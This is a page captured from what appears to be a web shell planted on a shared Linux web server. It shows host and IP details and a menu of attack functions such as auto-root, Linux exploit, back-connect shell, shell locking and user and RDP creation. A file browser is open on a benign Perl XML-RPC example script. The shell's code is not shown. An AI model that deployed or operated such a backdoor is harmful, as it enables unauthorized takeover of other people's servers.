Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libfrontier-rpc-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
cli-xml-rpc.pl
3.09
KB
-rw-r--r--
example-cli-input
187
B
-rw-r--r--
rpc-client.pl
2.18
KB
-rw-r--r--
states-client.pl
871
B
-rw-r--r--
states-daemon.pl
1.5
KB
-rw-r--r--
validator1-daemon.pl
1.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : states-client.pl
# # Copyright (C) 1999 Ken MacLeod # See the file COPYING for distribution terms. # # $Id: states-client.pl,v 1.1 1999/01/19 19:14:41 kmacleod Exp $ # require 'dumpvar.pl'; # used to dump results use Frontier::Client; $url = 'http://betty.userland.com/RPC2'; # this client will accept a URL on the command line if it's given if ($#ARGV > -1) { $url = $ARGV[0]; } $server = Frontier::Client->new( url => $url ); printf "Calling examples.getStateName\n"; $result = $server->call('examples.getStateName', 41); dumpvar ('main', 'result'); printf "Calling examples.getStateList\n"; $result = $server->call('examples.getStateList', [12, 28, 33, 39, 46]); dumpvar ('main', 'result'); printf "Calling examples.getStateStruct\n"; $result = $server->call('examples.getStateStruct', { state1 => 18, state2 => 27, state3 => 48 }); dumpvar ('main', 'result');
Close